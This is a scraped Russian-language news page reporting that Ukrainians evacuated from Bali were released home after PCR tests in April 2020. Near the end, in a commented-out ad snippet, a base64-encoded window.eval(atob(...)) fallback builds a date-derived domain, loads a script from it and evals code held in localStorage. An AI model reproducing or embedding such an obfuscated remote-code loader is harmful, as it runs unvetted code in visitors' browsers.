class="links_bal"></div>  </div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category"><style type="text/css" media="screen">@import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);</style><style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px}</style><div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" > <div itemscope itemtype="https://schema.org/NewsArticle" class="post _ga1_on_" style="margin:0; padding:0; " id="post-4800370"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/zdorove/full/404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam"/><article style="font-size:12pt;"><h1 itemprop="headline" id="postTitle">Украинцы, которых эвакуировали с Бали, разъехались по домам</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/zdorove">Здоровье</a> <span>&raquo;</span> Украинцы, которых эвакуировали с Бали, разъехались по домам</div><time datetime="2020-04-04T19:02:31+03:00"><span id="date">Здоровье, 19:02:31 </span></time><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span><span class="swp_count">1</span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%86%D1%8B%2C+%D0%BA%D0%BE%D1%82%D0%BE%D1%80%D1%8B%D1%85+%D1%8D%D0%B2%D0%B0%D0%BA%D1%83%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BB%D0%B8+%D1%81+%D0%91%D0%B0%D0%BB%D0%B8%2C++%D1%80%D0%B0%D0%B7%D1%8A%D0%B5%D1%85%D0%B0%D0%BB%D0%B8%D1%81%D1%8C+%D0%BF%D0%BE+%D0%B4%D0%BE%D0%BC%D0%B0%D0%BC&url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%86%D1%8B%2C+%D0%BA%D0%BE%D1%82%D0%BE%D1%80%D1%8B%D1%85+%D1%8D%D0%B2%D0%B0%D0%BA%D1%83%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BB%D0%B8+%D1%81+%D0%91%D0%B0%D0%BB%D0%B8%2C++%D1%80%D0%B0%D0%B7%D1%8A%D0%B5%D1%85%D0%B0%D0%BB%D0%B8%D1%81%D1%8C+%D0%BF%D0%BE+%D0%B4%D0%BE%D0%BC%D0%B0%D0%BC&url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4800370" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><p><b>Украинцев, которые 30 марта вернулись в Украину двумя рейсами из Дохи в разгар коронавиурса в мире, отпустили с обсервации домой, предварительно проведя тестирование методом ПЦР на наличие COVID-19. </b></p><p><img src="https://enovosty.com/wp-content/uploads/2020/04/da1fd0e97fa355524b888f9090276ff8.gif" title="Украинцы, которых эвакуировали с Бали, разъехались по домам" alt="Украинцы, которых эвакуировали с Бали, разъехались по домам" width="480" height="282" class="aligncenter size-full wp-image-4800371" /></p><p><a class="tag" href="https://enovosty.com/tag/ukraincy" target="_blank">Украинцы</a>, которые проходили процедуру обсервации в отелях «Пуща Конгресс» и «Козацкий» разъехались по домам. , информирует <a class="inform" href="https://enovosty.com/news">enovosty.com/news</a>.</p><p>Согласно распоряжения Главного санитарного врача Виктора Ляшко, все кто прибыл обязаны на третий день обсервации, пройти ПЦР тесты и в случае отрицательного результата смогут отправится домой. </p><p>Все проживающие в отелях украинцы сдали тесты 1 апреля, ( на третий день), а уже 4 апреля разъехались по домам, подписав обязательное согласие на прохождение обсервации дома.</p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/zdorove/full/3003-turisty-iz-bali-otkazyvayutsya-ot-observacii-i-ugrozhayut-golodovkoj-video" >Туристы из Бали отказываются от обсервации и угрожают голодовкой (ВИДЕО)</a></p><div class="tptn_counter" style="color:white;" id="tptn_counter_4800370"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4800370&amp;_wpnonce=c80b90bbd1"></script></div><div class="swp-content-locator"></div><br /><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"/> <meta itemprop="width" content="512"> <meta itemprop="height" content="512"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Елена Каденко" /></span><meta itemprop="datePublished" content="2020-04-04T19:02:31+03:00"/><meta itemprop="dateModified" content="2020-04-04T19:03:08+03:00"/><meta itemprop="genre" content="Здоровье"/><meta itemprop="description" content="Украинцев, которые 30 марта вернулись в Украину двумя рейсами из Дохи в разгар коронавиурса в мире, отпустили с обсервации домой, предварительно проведя тестирование методом ПЦР на наличие COVID-19. "/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"><span itemprop="image" content="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"><meta itemprop="width" content="512" /><meta itemprop="height" content="512" /> </span></span></div></article></div> <div class="postFooter" style="padding:0;"><a href="https://t.me/enovosty" target="_blank"><img alt="Экономические новости telegram" src="https://enovosty.com/wp-content/themes/eizvestia/img/Telegram1_Baner1_Siniy3.png"></a><span id="authorName" style="margin-right: 25px;float: left;"><span id="label">Автор: Елена Каденко</span></span><div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">ТЕГИ: <a href="https://enovosty.com/tag/bvli" rel="tag">бвли</a>, <a href="https://enovosty.com/tag/doha" rel="tag">Доха</a>, <a href="https://enovosty.com/tag/koronavirus" rel="tag">коронавирус</a>, <a href="https://enovosty.com/tag/ukraincy" rel="tag">украинцы</a>, <a href="https://enovosty.com/tag/evakuaciya" rel="tag">эвакуация</a></div><div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 619</div><div class="voteBox" > </div><br /><p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span><span class="swp_count">1</span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%86%D1%8B%2C+%D0%BA%D0%BE%D1%82%D0%BE%D1%80%D1%8B%D1%85+%D1%8D%D0%B2%D0%B0%D0%BA%D1%83%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BB%D0%B8+%D1%81+%D0%91%D0%B0%D0%BB%D0%B8%2C++%D1%80%D0%B0%D0%B7%D1%8A%D0%B5%D1%85%D0%B0%D0%BB%D0%B8%D1%81%D1%8C+%D0%BF%D0%BE+%D0%B4%D0%BE%D0%BC%D0%B0%D0%BC&url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%86%D1%8B%2C+%D0%BA%D0%BE%D1%82%D0%BE%D1%80%D1%8B%D1%85+%D1%8D%D0%B2%D0%B0%D0%BA%D1%83%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BB%D0%B8+%D1%81+%D0%91%D0%B0%D0%BB%D0%B8%2C++%D1%80%D0%B0%D0%B7%D1%8A%D0%B5%D1%85%D0%B0%D0%BB%D0%B8%D1%81%D1%8C+%D0%BF%D0%BE+%D0%B4%D0%BE%D0%BC%D0%B0%D0%BC&url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4800370" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="03ba66191b" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script></div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div><br><div id='admixer_f1971219dfb645c1a3626879325bc045_zone_45971_sect_1082_site_1069' data-sender='admixer'></div><script type='text/javascript'>(window.globalAmlAds = window.globalAmlAds || []).push(function() {globalAml.display('admixer_f1971219dfb645c1a3626879325bc045_zone_45971_sect_1082_site_1069');});</script> <div class="mainPageWiget articles" style="overflow:visible;"><p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;"><a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p><hr style="border: 1px solid #000000;"><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4799983"><div class="blockTitle"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/ei_size.gif" /><a class="postTitle" href="https://enovosty.com/markets/full/104-rynok-zemli-po-ukrainski-kto-poluchit-naibolshuyu-vygodu-ot-zemelnoj-reformy-chast-2">Рынок земли по-украински. Кто получит наибольшую выгоду от земельной реформы? Часть 2.</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4799684"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/markets/full/2803-ne-dabi-edinym-sxemy-kuchera-kudryavceva-rabotayut-dazhe-posle-likvidacii-inspekcii">Не ДАБИ единым: схемы Кучера-Кудрявцева работают даже после «ликвидации» Инспекции</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4799647"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/society/full/2803-v-odnom-ukrainskom-rajone-koronavirus-obnaruzhili-u-21-medika">В одном украинском районе коронавирус обнаружили у 21 медика</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4799555"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/2803-itogi-nedeli-borba-mira-s-koronavirusom-cugcvang-zelenskogo">Итоги недели: Борьба мира с коронавирусом, цугцванг Зеленского и коллапс на границах</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4798773"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/2103-koronavirus-eto-eshhe-konec-istorii-ili-uzhe-konec-sveta">Коронавирус: это еще конец истории или уже конец света?</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4798691"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/2003-itogi-nedeli-krupnejshee-ispytanie-dlya-evrosoyuza-koronovirus-i-ukraincy-i-neftyanye-vojny">Итоги недели: Крупнейшее испытание для Евросоюза, короновирус и украинцы и нефтяные войны</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4798088"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/markets/full/1603-gibel-bogov">Гибель Богов</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4798062"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/ekonomika/full/1603-mirovoj-ekonomicheskij-shok-iz-za-koronavirusa-posledstviya-dlya-ukrainskoj-ekonomiki">Мировой экономический шок из-за коронавируса: последствия для украинской экономики</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4797842"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1403-itogi-dnya-pervaya-smert-ot-koronavirusa-zakrytye-granicy-i">Итоги дня: Первая смерть от коронавируса, закрытые границы и продление санкций</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4797805"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1303-putin-koshhej-bessmertnyj-nashix-dnej">Путин – Кощей Бессмертный наших дней</a></div><div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div></div></div><br /><div
id='admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069');});</script><div id="pop_video" class="six"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="6"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/zdorove/full/3003-komarovskij-rasskazal-kakie-lekarstva-nuzhno-imet-v-aptechke-na-sluchaj-koronavirusa"><img width="142" height="88" alt="Комаровский рассказал, какие лекарства нужно иметь в аптечке на случай коронавируса" src="https://enovosty.com/wp-content/uploads/2020/03/komarovskiy.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/zdorove/full/3003-komarovskij-rasskazal-kakie-lekarstva-nuzhno-imet-v-aptechke-na-sluchaj-koronavirusa">Комаровский рассказал, какие лекарства нужно иметь в аптечке на случай коронавируса</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/zdorove/full/2903-zhenshhina-na-kolenyax-prosit-proshheniya-u-odnoselchan-kotoryx-zarazila-koronavirusom-video"><img width="142" height="88" alt="Женщина на коленях просит прощения у односельчан, которых заразила коронавирусом" src="https://enovosty.com/wp-content/uploads/2020/03/kolenkovtsy.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/zdorove/full/2903-zhenshhina-na-kolenyax-prosit-proshheniya-u-odnoselchan-kotoryx-zarazila-koronavirusom-video">Женщина на коленях просит прощения у односельчан, которых заразила коронавирусом</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/zdorove/full/2803-lyuks-karantin-kak-ukrainskaya-elita-vygryzala-vip-palaty-v-kievskix-bolnicax-video"><img width="142" height="88" alt="Люкс-карантин: Как украинская элита выгрызала vip-палаты в киевских больницах" src="https://enovosty.com/wp-content/uploads/2020/03/koronavirus-v-ukraine.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/zdorove/full/2803-lyuks-karantin-kak-ukrainskaya-elita-vygryzala-vip-palaty-v-kievskix-bolnicax-video">Люкс-карантин: Как украинская элита выгрызала vip-палаты в киевских больницах</a></div></td></tr><tr><td class="view"><span><i></i>9528</span></td><td class="view"><span><i></i>6039</span></td><td class="view last"><span><i></i>4633</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_society/full/3103-kak-korova-na-batute-v-ssha-korova-vzobralas-na-batut-no-chto-to-poshlo-ne-tak-video"><img width="142" height="88" alt="Как корова на батуте: в США корова взобралась на батут, но что-то пошло не так" src="https://enovosty.com/wp-content/uploads/2020/03/screenshot_217_0-e1585677445840.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_society/full/3103-kak-korova-na-batute-v-ssha-korova-vzobralas-na-batut-no-chto-to-poshlo-ne-tak-video">Как корова на батуте: в США корова взобралась на батут, но что-то пошло не так</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_society/full/3003-tolkali-medikov-i-proryvali-telezhkami-poyavilos-zhutkoe-video-ukraincev"><img width="142" height="88" alt="Толкали медиков и прорывали тележками: Появилось жуткое видео украинцев" src="https://enovosty.com/wp-content/uploads/2020/03/borispol1.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_society/full/3003-tolkali-medikov-i-proryvali-telezhkami-poyavilos-zhutkoe-video-ukraincev">Толкали медиков и прорывали тележками: Появилось жуткое видео украинцев</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_abroad/full/104-v-velikobritanii-gornye-kozly-zaxvatili-gorod-video"><img width="142" height="88" alt="В Великобритании горные козлы захватили город" src="https://enovosty.com/wp-content/uploads/2020/04/2020-04-01-9.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/104-v-velikobritanii-gornye-kozly-zaxvatili-gorod-video">В Великобритании горные козлы захватили город</a></div></td></tr><tr><td class="view"><span><i></i>4084</span></td><td class="view"><span><i></i>4074</span></td><td class="view last"><span><i></i>3515</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div> <div id='div-gpt-ad-1516280158772-0' style='height:60px; width:468px;'></div><script type='text/javascript'>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1516280158772-0'); });</script></br><div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/zdorove/full/404-nazvana-podavlyayushhaya-covid-19-vlazhnost-vozduxa-issledovanie" rel="bookmark">Названа подавляющая COVID-19 влажность воздуха, - исследование</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/zdorove/full/404-vrach-iz-nyu-jorka-rasskazal-kak-na-99-procentov-izbezhat-zarazheniya-na-covid-19" rel="bookmark">Врач из Нью-Йорка рассказал как на 99 процентов избежать заражения на COVID-19</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/zdorove/full/404-koronavirus-mozhet-sprovocirovat-porazhenie-mozga" rel="bookmark">Коронавирус может спровоцировать поражение мозга</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_economy/full/404-klichko-podschital-skolko-lyudi-smogut-eshhe-prosidet-na-karantine-za-svoj-schyot" rel="bookmark">Кличко подсчитал, сколько люди смогут еще просидеть на карантине за свой счёт</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/404-sovremennoe-piratstvo-ssha-perexvatili-200-tysyach-masok-prednaznachennyx-dlya-germanii" rel="bookmark">Современное пиратство: США перехватили 200 тысяч масок, предназначенных для Германии</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/zdorove/full/404-koshka-sumela-vyzhit-odna-v-dome-i-rodit-kotyat-poka-ee-xozyain-lechilsya-ot-covid-19-foto" rel="bookmark">Невероятная история: кошка сумела выжить одна в доме и родить котят, пока ее хозяин лечился от COVID-19 (ФОТО)</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/uk/news_society-ukr/full/404-ves-svit-na-karantini-a-shho-roblyat-domashni-tvarini-foto" rel="bookmark">Весь світ на карантині: ТОП-10 фото домашніх улюбленців (ФОТО)</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/zdorove/full/304-nazvany-domashnie-zhivotnye-dlya-kotoryx-opasen-koronavirus-issledovanie" rel="bookmark">Названы домашние животные, для которых опасен коронавирус, - исследование</a><br /></td> </tr><tr></tr></table></div><div class="bannerB"><div id="phoenix57c02c9d4f32fe394547dcf1"></div><script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57c02c9d4f32fe394547dcf1";</script><script src="//phoenix-widget.com/static/js/jsonp.js"></script></div><!--<div id="MIXADV_6543" class="MIXADVERT_NET"></div><script>var node6543 = document.getElementById("MIXADV_6543");if( node6543 )
{var script = document.createElement("script");script.charset = "utf-8";script.src = "https://m.mixadvert.com/show/?id=6543&r="+Math.random();
node6543.parentNode.appendChild(script);script.onerror = function(){window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY1NDMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjU0My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY1NDMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY1NDMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY1NDMiKSkgfSwgNTAwMCk7ICA7fTsg") );}}</script>
